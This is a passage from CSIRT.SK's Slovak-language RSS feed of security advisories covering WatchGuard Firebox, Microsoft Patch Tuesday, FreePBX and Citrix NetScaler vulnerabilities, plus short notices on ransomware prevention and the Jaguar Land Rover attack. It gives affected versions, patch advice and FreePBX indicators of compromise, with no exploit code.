<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/gavBXZkB3M5y24TXhvg-">https://exchange.xforce.ibmcloud.com/vulnerabilities/gavBXZkB3M5y24TXhvg-</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/G5zCXZkBvxtUtBM1BiSG">https://exchange.xforce.ibmcloud.com/vulnerabilities/G5zCXZkBvxtUtBM1BiSG</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/qKzjXZkB3M5y24TX6A38">https://exchange.xforce.ibmcloud.com/vulnerabilities/qKzjXZkB3M5y24TX6A38</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/google-patches-sixth-chrome-zero-day-exploited-in-attacks-this-year/">https://www.bleepingcomputer.com/news/security/google-patches-sixth-chrome-zero-day-exploited-in-attacks-this-year/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2806/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v operačnom systéme firewallov WatchGuard Firebox</title>
		<link>/posts/2803</link>
					<comments>/posts/2803#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 29 Sep 2025 09:00:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Firebox]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WatchGuard]]></category>
		<guid isPermaLink="false">/?p=2803</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/09/watchguard.png" alt="" /></p>Spoločnosť WatchGuard vydala bezpečnostné aktualizácie svojich firewallov Firebox, ktoré opravujú kritickú zraniteľnosť operačného systému Fireware OS. CVE-2025-9242 by vzdialený neautentifikovaný...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/09/watchguard.png" alt="" /></p>
<p><strong>Spoločnosť WatchGuard vydala bezpečnostné aktualizácie svojich firewallov Firebox, ktoré opravujú kritickú zraniteľnosť operačného systému Fireware OS. CVE-2025-9242 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Fireware OS 2025.1 vo verziách starších ako 2025.1.1</li>



<li>Fireware OS 12.x vo verziách starších ako 12.11.4</li>



<li>Fireware OS 12.5.x (modely T15 a T35) vo verziách starších ako 12.5.13</li>



<li>Fireware OS 12.3.1 (release s&nbsp;FIPS certifikáciou) vo verziách bez 12.3.1_Update3 (B722811)</li>



<li>Fireware OS 11.x vo všetkých verziách (jedná sa o&nbsp;produkty s&nbsp;ukončenou podporou)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-9242 </strong>(CVSSv4 skóre 9,3)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;možnosti zápisu do pamäte mimo povolených hodnôt a vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zraniteľnosť je možné zneužiť na VPN pre mobilných používateľov s IKEv2 a BOVPN (Branch Office VPN) s&nbsp;IKEv2 nakonfigurovanom s&nbsp;dynamickou bránou. Ak bol firewall nakonfigurovaný jedným z&nbsp;týchto dvoch spôsobov a&nbsp;tieto konfigurácie boli zmazané, zariadenie môže byť podľa výrobcu stále zraniteľné, pokiaľ má nakonfigurovanú BOVPN so statickou bránou.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu aspoň na verzie 12.3.1_Update3 (B722811), 12.5.13, 12.11.4, alebo 2025.1.1. V&nbsp;prípade Fireware OS 11.x je potrebné vykonať migráciu na produkty s&nbsp;platnou podporou. Výrobca odporúča vykonať aj hardening BOVPN využívajúcich IpSec a IKEv2. Kompletný návod môžete nájsť <a href="https://techsearch.watchguard.com/KB?type=Article&amp;SFDCID=kA1Vr000000DMXNKA4&amp;lang=en_US">online</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015">https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/watchguard-warns-of-critical-vulnerability-in-firebox-firewalls/">https://www.bleepingcomputer.com/news/security/watchguard-warns-of-critical-vulnerability-in-firebox-firewalls/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2803/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ransomvér v infraštruktúre: Ako sa ochrániť?</title>
		<link>/posts/2800</link>
					<comments>/posts/2800#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 19 Sep 2025 10:15:38 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[návod]]></category>
		<category><![CDATA[ransomware]]></category>
		<guid isPermaLink="false">/?p=2800</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Hrozba preniknutia útočníkov do IT infraštruktúry organizácie zneužitím rôznych ciest je veľmi reálnym ohrozením chodu celej organizácie. Následná krádež a zašifrovanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Hrozba preniknutia útočníkov do IT infraštruktúry organizácie zneužitím rôznych ciest je veľmi reálnym ohrozením chodu celej organizácie. Následná krádež a zašifrovanie dôležitých informácií a systémov môžu vyradiť služby a spôsobiť rozsiahle reputačné a finančné škody. V najhorších prípadoch môžu viesť ku ohrozeniu zdravia a životov, či fyzickým škodám. </p>



<p>Na základe našich skúseností z reálnych prípadov sme pre Vás pripravili súhrn opatrení, ktoré Vám poslúžia ako najlepšia prevencia pred podobnými incidentmi. Nasadením každého jedného z nich o krôčik zvýšite svoju bezpečnosť.</p>



<p>Dokument vo formáte PDF nájdete <a href="https://csirt.sk/wp-content/uploads/2025/09/Ransomver_-_ako_sa_chranit.pdf" data-type="link" data-id="/wp-content/uploads/2025/09/Ransomver_-_ako_sa_chranit.pdf">tu</a>, alebo v sekcii <a href="https://csirt.sk/navody-a-odporucania">Návody a odporúčania</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2800/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci Patch Tuesday opravil dve aktívne zneužívané zraniteľnosti</title>
		<link>/posts/2795</link>
					<comments>/posts/2795#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 11 Sep 2025 14:47:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2795</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v septembri 2025 balík opráv pre portfólio svojich produktov opravujúci 81 zraniteľností, z&#160;ktorých 8 spoločnosť označila ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v septembri 2025 balík opráv pre portfólio svojich produktov opravujúci 81 zraniteľností, z&nbsp;ktorých 8 spoločnosť označila ako kritické. Tieto umožňujú vzdialene vykonávať kód, eskalovať oprávnenia a&nbsp;získať citlivé informácie. Dve zraniteľnosti sú typu zero-day.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Azure Connected Machine Agent</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft AutoUpdate for Mac</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft HPC Pack 2019</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office for Android</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft OfficePLUS</li>



<li>Microsoft PowerPoint 2016 (32-bit edition)</li>



<li>Microsoft PowerPoint 2016 (64-bit edition)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (CU 31)</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (CU 32)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (CU 20)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (GDR)</li>



<li>Microsoft Word 2016 (32-bit edition)</li>



<li>Microsoft Word 2016 (64-bit edition)</li>



<li>Office Online Server</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>



<li>Xbox Gaming Services</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka Patch Tuesday 81 zraniteľností vo svojich produktoch, z ktorých 8 označila ako kritické a 72 ako „dôležité“ (Important). Jedna nedostala označenie závažnosti. Kritické zraniteľnosti umožňujú vzdialene vykonávať kód, eskalovať oprávnenia a získať citlivé informácie. Dve zraniteľnosti sú aktívne zneužívané.</p>



<p><strong>CVE-2025-55234</strong> (CVSSv3.1 skóre 8,8)</p>



<p>Vývojári spoločnosti Microsoft opravili aktívne zneužívanú zraniteľnosť v komponente SMB Server, ktorá umožňuje útočníkom eskalovať svoje oprávnenia. Pri istých konfiguračných nastaveniach môžu na to útočníci využiť techniku tzv. relay attack, odchytiť autentifikačné infromácie a zneužiť ich pre neautorizovaný prístup do systému.</p>



<p><strong>CVE-2024-21907</strong> (CVSSv3.1 skóre 7,5)</p>



<p>Druhá opravená zneužívaná zraniteľnosť sa nachádza v knižnici tretej strany Newtonsoft.Json verzií starších ako 13.0.1, ktorá je súčasťou Microsoft SQL Server. Súvisí s nesprávnym spracovaním výnimiek metódou JsonConvert.DeserializeObject. Neautentifikovaný vzdialený útočník môže spôsobiť nedostupnosť služby odoslaním špeciálne upravených dát, ktoré vyvolajú výnimku typu StackOverflow.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo <a href="https://msrc.microsoft.com/update-guide/">stránky výrobcu</a>. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac september a Mode „Update Tuesday“. Bližšie informácie nájdete aj <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Sep">tu</a>.</p>



<p>Pre mitigáciu zraniteľnosti CVE-2025-55234 Microsoft odporúča zapnúť SMB Server Signing a SMB Server Extended Protection for Authentication (EPA). To však môže spôsobovať problémy s kompatibilitou voči starším zariadeniam.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/">https://msrc.microsoft.com/update-guide/</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55234">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55234</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21907">https://nvd.nist.gov/vuln/detail/CVE-2024-21907</a></li>



<li><a href="https://thehackernews.com/2025/09/microsoft-fixes-80-flaws-including-smb.html">https://thehackernews.com/2025/09/microsoft-fixes-80-flaws-including-smb.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2025-patch-tuesday-fixes-81-flaws-two-zero-days/">https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2025-patch-tuesday-fixes-81-flaws-two-zero-days/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2795/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – august 2025</title>
		<link>/posts/2789</link>
					<comments>/posts/2789#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Sep 2025 13:16:31 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2789</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci august 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci august 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/09/MS202508.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 08/2025 PDF (1 904 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2789/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Odolali by ste útoku, ktorý zasiahol Jaguar Land Rover?</title>
		<link>/posts/2777</link>
					<comments>/posts/2777#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 04 Sep 2025 14:13:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Jaguar]]></category>
		<guid isPermaLink="false">/?p=2777</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/09/Jaguar.jpeg" alt="" /></p>Aktuálna situácia: Automobilová spoločnosť Jaguar Land Rover informovala v oficiálnom vyhlásení, že čelí kybernetickému útoku a podnikla kroky na obnovenie bežnej produkcie....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/09/Jaguar.jpeg" alt="" /></p>
<p><strong>Aktuálna situácia:</strong></p>



<p>Automobilová spoločnosť Jaguar Land Rover informovala v oficiálnom vyhlásení, že čelí kybernetickému útoku a podnikla kroky na obnovenie bežnej produkcie. Britské denníky BBC a The Guardian sa o útoku dozvedeli počas jeho priebehu. Cieľom útočníkov bolo vymáhanie peňazí. Podľa aktuálnych informácií nedošlo k úniku dát zákazníkov, ale útok spôsobil pozastavenie viacerých prevádzok. Aktuálne sa k útoku hlási skupina &#8220;Scattered Lapsus$ Hunters&#8221;, ktorá nebola stotožnená so žiadnou známou APT skupinou.</p>



<p><strong>Prečo je to dôležité:</strong></p>



<p>O útoku informujeme najmä preto, aby sme poukázali na skutočnosť, že zaujímavým cieľom kybernetických útokov nie sú len počítače a smartfóny, ale aj priemyselné zariadenia a SMART spotrebiče ako napríklad inteligentné chladničky, SMART TV, sieťové routery alebo priemyselné systémy SIEMENS či Honeywell. Tieto zariadenia často nemávajú dlhú podporu bezpečnostných aktualizácií, ktoré navyše ich používatelia bežne zabúdajú aplikovať. Často sú nedopatrením alebo zámerne pripojené na internet, čím sa stávajú lákavým cieľom mnohých kybernetických útokov vedúcich k odcudzeniu súkromných či platobných údajov alebo korporátnych tajomstiev. Práve v priemyselnom prostredí sú potom častým vektorom na nasadenie ransomvéru.</p>



<p><strong>Odporúčania:</strong></p>



<p>VJ CSIRT pravidelne informuje administrátorov, ale aj širokú verejnosť pomocou svojho webu o aktuálnych nebezpečných softvérových zraniteľnostiach aj s návodmi na ich mitigáciu. Spravidla sa vždy odporúča využívať aktualizovaný softvér v celej infraštruktúre a strániť sa vystaveniu zariadení na (verejný) internet ak to nie je nevyhnutné. Užitočné rady a návody môžete nájsť aj v našej sekcii <a href="https://csirt.sk/rady-a-navody.html">Metodiky a návody</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://media.jaguarlandrover.com/news/2025/09/statement-cyber-incident">https://media.jaguarlandrover.com/news/2025/09/statement-cyber-incident</a></li>



<li><a href="https://www.bbc.com/news/articles/c4gqepe5355o">https://www.bbc.com/news/articles/c4gqepe5355o</a></li>



<li><a href="https://www.bbc.com/news/articles/c9wywvllq7wo">https://www.bbc.com/news/articles/c9wywvllq7wo</a></li>



<li><a href="https://www.theguardian.com/business/2025/sep/02/jaguar-land-rover-cyber-incident-manufacturing-retail">https://www.theguardian.com/business/2025/sep/02/jaguar-land-rover-cyber-incident-manufacturing-retail</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2777/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosť vo FreePBX bola opravená</title>
		<link>/posts/2774</link>
					<comments>/posts/2774#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 04 Sep 2025 14:06:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[FreePBX]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2774</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/09/freepbx-logo-300-215.png" alt="" /></p>Bezpečnostní výskumníci zo Sangoma FreePBX Security Team informovali o kritickej zero-day zraniteľnosti v&#160;rozšírenom open-source komunikačnom softvéri FreePBX, využívanom najmä v&#160;call...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/09/freepbx-logo-300-215.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo Sangoma FreePBX Security Team informovali o kritickej zero-day zraniteľnosti v&nbsp;rozšírenom open-source komunikačnom softvéri FreePBX, využívanom najmä v&nbsp;call centrách. Zraniteľnosť bola označená ako aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FreePBX 15 po verziu 15.0.66</li>



<li>FreePBX 16 po verziu 16.0.89</li>



<li>FreePBX 17 po verziu 17.0.3</li>
</ul>



<p>Zraniteľnosť sa týka iba systémov s&nbsp;panelom administrátora prístupným z&nbsp;internetu.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-57819</strong>(CVSS 4.0 skóre 10,0)</p>



<p>Zraniteľnosť spočíva v&nbsp;nedostatočnej sanitácii vstupu od používateľa. Neautentifikovaný útočník môže pomocou škodlivého vstupu získať administrátorské oprávnenia. Bližšie informácie o&nbsp;povahe zraniteľnosti ani „proof-of-concept“ nie sú verejne dostupné vzhľadom na jej vysokú závažnosť.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Narušenie dostupnosti, integrity a dôvernosti služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladne vypnúť verejný prístup k&nbsp;administrátorskému panelu z&nbsp;internetu a vykonať aktualizáciu na verzie vyššie alebo rovné:</p>



<ul>
<li>FreePBX 15 v15.0.66</li>



<li>FreePBX 16 v16.0.89</li>



<li>FreePBX 17 v17.0.3</li>
</ul>



<p>Podľa vývojárov FreePBX <strong>by mali </strong>verzie 15 a&nbsp;16 automaticky spustiť bezpečnostnú aktualizáciu. Pri verzii 17 je možné, že sa táto aktualizácia <strong>nespustí</strong> automaticky. Pokiaľ využívate FreePBX s&nbsp;koncovým modulom (endpoint module) a&nbsp;máte podozrenie kompromitácie systému, odporúčame <strong>okamžité</strong> odpojenie od siete.</p>



<p><strong>Indikátory kompromitácie:</strong></p>



<p>Pri podozrení z&nbsp;kompromitácie odporúčame preveriť nasledovné:</p>



<ul>
<li>Nedávno modifikovaný súbor: <em>/etc/freepbx.conf</em></li>



<li>Súbor <em>/var/www/html/.clean.sh</em> – <strong>nemal by existovať</strong></li>



<li>Podozrivé POST žiadosti na <em>modular.php</em> v&nbsp;Apache web serveri začínajúce okolo dátumu 21.8.2025</li>



<li>Hovory na číslo 9998 v&nbsp; logoch servera Asterisk a&nbsp;CDR nie sú štandardom (pokiaľ neboli nakonfigurované pre konkrétny use-case)</li>



<li>Podozrivé alebo neznáme užívateľské konto v&nbsp;databáze ampuser</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-57819">https://nvd.nist.gov/vuln/detail/CVE-2025-57819</a></li>



<li><a href="https://thehackernews.com/2025/08/freepbx-servers-targeted-by-zero-day.html">https://thehackernews.com/2025/08/freepbx-servers-targeted-by-zero-day.html</a></li>



<li><a href="https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h">https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h</a></li>



<li><a href="https://www.securityweek.com/sangoma-patches-critical-zero-day-exploited-to-hack-freepbx-servers/">https://www.securityweek.com/sangoma-patches-critical-zero-day-exploited-to-hack-freepbx-servers/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2774/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností august 2025</title>
		<link>/posts/2756</link>
					<comments>/posts/2756#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 02 Sep 2025 10:34:38 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2756</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci august 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci august 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/09/2025_08_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 08/2025 PDF (552 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2756/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Nové závažné zraniteľnosti Citrix NetScaler môžu byť aktívne zneužívané</title>
		<link>/posts/2715</link>
					<comments>/posts/2715#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 28 Aug 2025 10:56:45 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[NetScaler]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2715</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>Spoločnosť Citrix opravila jednu kritickú a dve vysoko závažné zraniteľnosti zariadení NetScaler ADC a NetScaler Gateway. Kritická zraniteľnosť je pravdepodobne...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>
<p><strong>Spoločnosť Citrix opravila jednu kritickú a dve vysoko závažné zraniteľnosti zariadení NetScaler ADC a NetScaler Gateway. Kritická zraniteľnosť je pravdepodobne aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1 staršie ako 14.1-47.48</li>



<li>NetScaler ADC a NetScaler Gateway 13.1 staršie ako 13.1-59.22</li>



<li>NetScaler ADC 13.1-FIPS a NDcPP  staršie ako 13.1-37.241-FIPS a NDcPP</li>



<li>NetScaler ADC 12.1-FIPS a NDcPP  staršie ako 12.1-55.330-FIPS a NDcPP</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Citrix zverejnila viacero zraniteľností zariadení NetScaler ADC a NetScaler Gateway.</p>



<p><strong>CVE-2025-7775</strong> (CVSS v4.0 skóre 9,2)</p>



<p>Kritická zraniteľnosť súvisí s pretečením pamäte, ktorým je možné docieliť možnosť vzdialene vykonávať kód či spôsobiť nedostupnosť služby. Aby ju bolo možné zneužiť, musí byť splnená aspoň jedna z nasledujúcich podmienok:</p>



<ul>
<li>NetScaler nakonfigurovaný ako Gateway (virtuálny server VPN, ICA Proxy, CVPN, RDP Proxy)</li>



<li>NetScaler nakonfigurovaný ako virtuálny AAA server</li>



<li>Virtuálny load-balancing server typu HTTP, SSL alebo HTTP_QUIC spojený so službami IPv6 alebo servicegroups viazané na servery IPv6</li>



<li>Virtuálny load-balancing server typu HTTP, SSL alebo HTTP_QUIC spojený s doménovými službami (DBS) IPv6 alebo servicegroups viazané na doménové servery IPv6 (DBS)</li>



<li>NetScaler nakonfigurovaný s virtuálnym serverom pre presmerovanie cache (CR) s HDX</li>
</ul>



